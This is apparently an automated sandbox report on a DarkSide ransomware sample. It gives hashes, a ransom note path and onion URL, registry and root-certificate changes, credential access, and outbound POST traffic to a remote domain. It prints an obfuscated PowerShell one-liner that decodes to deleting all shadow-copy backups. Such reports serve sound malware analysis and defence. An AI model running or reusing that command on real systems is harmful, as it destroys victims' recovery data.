Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows11-21h2-x64
10Ransomware...KB.exe
windows10-2004-x64
3Ransomware...KB.exe
windows7-x64
7Ransomware...KB.exe
windows10-2004-x64
3Ransomware...KB.exe
windows10-ltsc_2021-x64
3Ransomware...KB.exe
windows11-21h2-x64
3Ransomware...KB.exe
windows11-21h2-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows11-21h2-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows11-21h2-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows11-21h2-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows11-21h2-x64
10Resubmissions
25/03/2025, 15:11 UTC
250325-skmbpsxzaw 1025/03/2025, 15:06 UTC
250325-sg1d6a1px2 1025/03/2025, 15:01 UTC
250325-sd5jpsxyct 1025/03/2025, 14:56 UTC
250325-sbdcfaxxgs 1025/03/2025, 14:50 UTC
250325-r7ve6a1nv3 1025/03/2025, 14:46 UTC
250325-r5ab7sxwhx 1025/03/2025, 14:40 UTC
250325-r2c9paxwe1 1005/02/2025, 10:25 UTC
250205-mgcefaslhw 1005/02/2025, 10:17 UTC
250205-mbs51atmbk 1005/02/2025, 09:15 UTC
250205-k785zs1pfn 10Analysis
-
max time kernel
118s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
25/03/2025, 14:50 UTC
Static task
static1
Behavioral task
behavioral1
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral5
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win11-20250314-en
Behavioral task
behavioral6
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral7
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral9
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral10
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win11-20250314-en
Behavioral task
behavioral11
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win11-20250314-en
Behavioral task
behavioral12
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win7-20241010-en
Behavioral task
behavioral13
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral14
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral15
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win11-20250314-en
Behavioral task
behavioral16
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win7-20240729-en
Behavioral task
behavioral18
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral19
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral20
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win11-20250313-en
Behavioral task
behavioral21
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral22
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win7-20240903-en
Behavioral task
behavioral23
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral24
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral25
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win11-20250314-en
Behavioral task
behavioral26
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral27
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral29
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral30
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win11-20250313-en
General
-
Target
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
-
SSDEEP
768:lXnIczxCbTRNl71wHpZQgYI1TQPB3aYJEOW:hIMxCXd1+pZQgYIxk3vJE
Malware Config
Extracted
C:\Users\Admin\README.83b4895b.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
Renames multiple (156) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 336 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\83b4895b.BMP" DarkSide_01_05_2021_30KB.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\83b4895b.BMP" DarkSide_01_05_2021_30KB.exe -
resource yara_rule behavioral12/memory/2776-0-0x0000000000100000-0x0000000000117000-memory.dmp upx behavioral12/memory/2776-30-0x0000000000100000-0x0000000000117000-memory.dmp upx behavioral12/memory/2776-233-0x0000000000100000-0x0000000000117000-memory.dmp upx behavioral12/memory/2776-237-0x0000000000100000-0x0000000000117000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkSide_01_05_2021_30KB.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\WallpaperStyle = "10" DarkSide_01_05_2021_30KB.exe -
Modifies registry class 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.83b4895b\ = "83b4895b" DarkSide_01_05_2021_30KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\83b4895b\DefaultIcon DarkSide_01_05_2021_30KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\83b4895b DarkSide_01_05_2021_30KB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\83b4895b\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\83b4895b.ico" DarkSide_01_05_2021_30KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.83b4895b DarkSide_01_05_2021_30KB.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 DarkSide_01_05_2021_30KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 DarkSide_01_05_2021_30KB.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 336 powershell.exe 2776 DarkSide_01_05_2021_30KB.exe 2776 DarkSide_01_05_2021_30KB.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeSecurityPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeTakeOwnershipPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeLoadDriverPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeSystemProfilePrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeSystemtimePrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeProfSingleProcessPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeIncBasePriorityPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeCreatePagefilePrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeBackupPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeRestorePrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeShutdownPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeDebugPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeSystemEnvironmentPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeRemoteShutdownPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeUndockPrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: SeManageVolumePrivilege 2776 DarkSide_01_05_2021_30KB.exe Token: 33 2776 DarkSide_01_05_2021_30KB.exe Token: 34 2776 DarkSide_01_05_2021_30KB.exe Token: 35 2776 DarkSide_01_05_2021_30KB.exe Token: SeDebugPrivilege 336 powershell.exe Token: SeBackupPrivilege 2440 vssvc.exe Token: SeRestorePrivilege 2440 vssvc.exe Token: SeAuditPrivilege 2440 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2776 wrote to memory of 336 2776 DarkSide_01_05_2021_30KB.exe 32 PID 2776 wrote to memory of 336 2776 DarkSide_01_05_2021_30KB.exe 32 PID 2776 wrote to memory of 336 2776 DarkSide_01_05_2021_30KB.exe 32 PID 2776 wrote to memory of 336 2776 DarkSide_01_05_2021_30KB.exe 32 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exeC:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe bcdedit /set shutdown /r /f /t 21⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2440
Network
-
Remote address:8.8.8.8:53Requestcatsdegree.comIN AResponsecatsdegree.comIN CNAME77980.bodis.com77980.bodis.comIN A199.59.243.228
-
Remote address:199.59.243.228:443RequestPOST /Sv3fxsTvVEM HTTP/1.1
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/80.0
Host: catsdegree.com
Content-Length: 442
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 1062
X-Request-Id: 5e6396bd-bfd5-470e-814d-1c84778fd63a
Cache-Control: no-store, max-age=0
Accept-Ch: sec-ch-prefers-color-scheme
Critical-Ch: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jn7WqeqShx+9bBCf60dL/nytfDYTFUvKJZ27ToXwnlNJBHzssdXOMt0JjmGL/AwU6JwWiIyrn80PYgb4Gq+zDA==
Set-Cookie: parking_session=5e6396bd-bfd5-470e-814d-1c84778fd63a; expires=Tue, 25 Mar 2025 15:07:00 GMT; path=/
Connection: close
-
Remote address:8.8.8.8:53Requestr11.o.lencr.orgIN AResponser11.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A2.18.190.206a1887.dscq.akamai.netIN A2.18.190.198
-
GEThttp://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3DDarkSide_01_05_2021_30KB.exeRemote address:2.18.190.206:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: r11.o.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "92A3DCC68E93C115CA84D3AFDF3A361C51D00D61AEB709765DF6F8B4C210E94D"
Last-Modified: Tue, 25 Mar 2025 14:14:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21593
Expires: Tue, 25 Mar 2025 20:51:53 GMT
Date: Tue, 25 Mar 2025 14:52:00 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Requesttemisleyes.comIN AResponse
-
Remote address:199.59.243.228:443RequestPOST /HNUbiunHtmYA HTTP/1.1
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/80.0
Host: catsdegree.com
Content-Length: 238
Cache-Control: no-cache
Cookie: parking_session=5e6396bd-bfd5-470e-814d-1c84778fd63a
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 1066
X-Request-Id: 1a4327c7-cb13-4626-aaae-141b8ac5fad5
Cache-Control: no-store, max-age=0
Accept-Ch: sec-ch-prefers-color-scheme
Critical-Ch: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_znyRQ3TkcP/cBXTOcy4oBLL9q4ac1JOMNg/e2WLo3glyPYpqX3G8bfr+3j0+kBpHM1j7KdwtewYW+n5fUONYiQ==
Set-Cookie: parking_session=5e6396bd-bfd5-470e-814d-1c84778fd63a; expires=Tue, 25 Mar 2025 15:07:28 GMT
Connection: close
-
Remote address:8.8.8.8:53Requesttemisleyes.comIN AResponse
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A23.192.18.101
-
Remote address:23.192.18.101:80RequestGET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-MD5: HqJzZuA065RHozzmOcAUiQ==
Last-Modified: Tue, 14 Jan 2025 20:41:31 GMT
ETag: 0x8DD34DBD43549F4
x-ms-request-id: 90d94cda-601e-004e-55c9-667962000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 25 Mar 2025 14:52:31 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV1b111006.0
ms-cv-esi: CASMicrosoftCV1b111006.0
X-RTag: RT
-
Remote address:8.8.8.8:53Requestcrl.microsoft.comIN AResponsecrl.microsoft.comIN CNAMEcrl.www.ms.akadns.netcrl.www.ms.akadns.netIN CNAMEa1363.dscg.akamai.neta1363.dscg.akamai.netIN A2.19.252.143
-
Remote address:2.19.252.143:80RequestGET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 26 Sep 2024 02:21:11 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-MD5: O14L1mQEVqdJ2RVebBNXJw==
Last-Modified: Wed, 26 Feb 2025 21:48:51 GMT
ETag: 0x8DD56AF5BD2A499
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 47bdeae0-d01e-0029-409a-88699e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 25 Mar 2025 14:52:31 GMT
Connection: keep-alive
-
1.6kB 5.5kB 12 11
HTTP Request
POST https://catsdegree.com/Sv3fxsTvVEMHTTP Response
200 -
2.18.190.206:80http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3DhttpDarkSide_01_05_2021_30KB.exe523 B 2.0kB 6 4
HTTP Request
GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3DHTTP Response
200 -
1.5kB 6.0kB 11 13
HTTP Request
POST https://catsdegree.com/HNUbiunHtmYAHTTP Response
200 -
393 B 1.7kB 4 4
HTTP Request
GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlHTTP Response
200 -
451 B 2.7kB 5 4
HTTP Request
GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crlHTTP Response
200
-
60 B 102 B 1 1
DNS Request
catsdegree.com
DNS Response
199.59.243.228
-
61 B 160 B 1 1
DNS Request
r11.o.lencr.org
DNS Response
2.18.190.2062.18.190.198
-
60 B 133 B 1 1
DNS Request
temisleyes.com
-
60 B 133 B 1 1
DNS Request
temisleyes.com
-
63 B 230 B 1 1
DNS Request
www.microsoft.com
DNS Response
23.192.18.101
-
63 B 146 B 1 1
DNS Request
crl.microsoft.com
DNS Response
2.19.252.143
MITRE ATT&CK Enterprise v15
Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f9773b3d4f105079d71fa14d362eca7b
SHA1161d2db78c298723b3501dbfbd4b73fa2f1ce439
SHA256c590a0d5e690e2cbd98acba4777abbeb3e76e68cb82c71d39e243922cad8b8d5
SHA51260e0956756f8ec0b7c28a06014805ff59aff2d25c527df35b7ccfcbb08ee5fedb40eb666e44f573c3cb65e3a78a10d99dd6bdef3c2d4bb88917a0006baa5542f
-
Filesize
1KB
MD5f418a249405444da33cc73b402a26306
SHA11a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf